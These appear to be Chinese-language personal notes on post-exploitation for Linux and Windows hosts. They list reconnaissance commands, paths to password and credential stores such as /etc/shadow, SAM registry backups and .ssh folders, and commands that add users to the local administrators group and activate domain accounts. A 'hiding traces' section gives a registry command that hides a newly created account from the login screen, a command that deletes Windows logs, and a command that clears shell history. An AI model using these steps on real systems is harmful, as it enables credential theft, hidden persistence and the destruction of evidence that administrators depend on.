应用系统的配置文件
应用连接数据库的配置文件
后台服务运行账号
linux
/etc/resolv.conf
/etc/passwd
/etc/shadow
whoami.who -a
ifconfig -a,i[tables -L -n,netstat -rn
uname -a.ps aux
dpkg -l|head
windows
ipconfig /all
ipconfig /displaydns 查看本地dns
netstat -bnao netstat -r
net view net view /domain
net user /domain, net user %username% /domain
net accounts, net share
net localgroup administrators username /add
net group "Domain Controllers" /domain net share name$=C:\ /unlimited
net user username /active:yes /domain
WMIC工具(windows上的)
可以查到很多信息
收集敏感信息
商业信息
系统信息
业务数据库
/tmp 可能存放临时数据
linux
/etc 文件下是些配置文件
,ssh .gnupg
.开头的文件一般隐藏
ls -la显示隐藏文件
windows
SAM 数据库:注册表文件
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
业务数据库 ;
身份认证数据库
临时文件目录
UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\
隐藏痕迹
windows
禁止在登陆界面显示新建账号
REG ADD"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0
删除日志
del %WINDIR%\*.log /a/s/q/f
linux
History
history -c 删除命令历史
lsattr 查看权限相关属相
changeattr 能让人删不了
日志
auth.log / secure
btmp / wtmp
lastlog / faillog
其他日志和 HIDS 等(入侵检测,集中的入侵记录器)
用last查看数据文件
